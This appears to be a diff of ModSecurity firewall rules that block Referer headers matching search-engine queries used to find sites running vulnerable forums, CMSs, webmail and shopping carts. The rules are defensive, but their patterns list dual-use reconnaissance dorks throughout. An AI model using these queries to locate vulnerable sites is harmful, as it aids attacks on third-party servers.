+SecRule REQUEST_HEADERS:Referer   "powered by duclassmate -site:duware\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371084,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by duclassified -site:duware\.com duware all rights reserved" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371085,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by dudirectory -site:duware\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371086,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by duclassified -site:duware\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371087,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by ducalendar -site:duware\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371088,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by elite forum version \*\.\*" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371095,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:admin panel \+powered by redkernel" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371265,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered\.by\.raidenhttpd intitle:index.of" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371494,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allin(?:text|body):powered by lionmax software www file share" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371501,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by shoutstats hourly daily" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371516,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by openbsd \+powered by apache" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371547,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by mailgust" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371555,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by my little forum" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371556,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by xcomic " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371563,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by funkboard" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371564,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by silvernews" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371569,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by gravity board" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371570,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by land down under 601" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371578,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by yelldl" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371582,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by: totalindex intitle:totalindex" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371634,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\|\|powered by \[clipbucket 2\.0\.91\]" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371674,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by midmart messageboard administrator login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371707,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by merak mail server software -\.gov -\.mil -\.edu -site:merakmailserver\.com -johnny\.ihackstuff" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371720,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by monster top list mtl numrange:200-" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371739,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by dwmail password intitle:dwmail" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371776,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ilohamail.*powered by ilohamail" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371779,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by uebimiau -site:sourceforge\.net" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371791,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:login - powered by easy file sharing web server " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371857,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "login.*powered by (?:jetbox one cms|jetstream)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371865,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by cutenews 2003\.\.2005 cutephp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371868,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by x-cart: shopping cart software -site:x-cart\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371907,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by hosting controller intitle:hosting\.controller " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371908,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by hit jammer 1\.0!" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371915,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by phpopentracker statistics " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371958,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:mvblog powered" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371985,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: vbulletin version 1\.1\.5" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371994,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:title|text):(?:visiongs webcam software|powered by visiongs webcam)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372091,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by webcamxp pro\|broadcast" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372228,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by alitalk" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372237,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by yourtube v1\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372239,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by uno\.com\.my" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372242,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by kaibb 1\.0\.1" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372244,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by cubecart 3\.0\.4" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372245,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: iriran\.net" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372247,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by pageadmin cms free version" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372251,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by simpleview cms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372252,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: webinspire" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372253,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by soop portal raven 1\.0b" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372257,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by dejcom market cms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372263,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by siteengine" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372269,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by nocc intitle:nocc webmail" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372275,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by bitweaver" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372277,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by shadowed portal" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372278,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by quick\.cart" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372279,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by thwboard" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372285,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by xmb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372286,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by gcards" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372289,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by tikiwiki" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372292,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "this site is powered by e107" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372293,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by sendcard - an advanced php e-card program" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372295,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by clantiger" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372297,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by online grades" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372298,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allintitle:powered by deluxebb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372299,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by bigace 2\.5" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372300,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by xmb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372301,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by exv2 vers" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372303,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by leap" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372306,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by pcpin\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372307,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by coppermine photo gallery" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372309,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by mercuryboard" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372310,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by php-update -site:www\.php-update\.co\.uk" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372312,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by quick\.cart" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372313,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by shop-script free" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372315,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by discuz!" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372317,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by quick\.cms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372324,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by guestbook script" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372332,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by x7 chat" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372333,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by php photo album -demo2 -pitanje" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372335,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by clantiger" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372337,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by php photo album" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372338,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by online grades" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372339,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by burning board lite 1\.0\.2 \* 2001-2004" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372346,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by claroline -demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372347,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by blur6ex" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372348,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by burning board lite 1\.0\.2 \* 2001-2004" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372351,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "is proudly powered by wordpress" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372352,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "this forum powered by phorum\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372353,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by (?:blog:cms|blogcms\.com)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372357,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "this site is powered by cms made simple" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372359,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by ilias" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372360,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by php update" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372363,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by mercuryboard" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372366,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by smf" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372368,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by simplog" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372369,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by zomplog" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372370,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by php-update -site:www\.php-update\.co\.uk" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372371,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
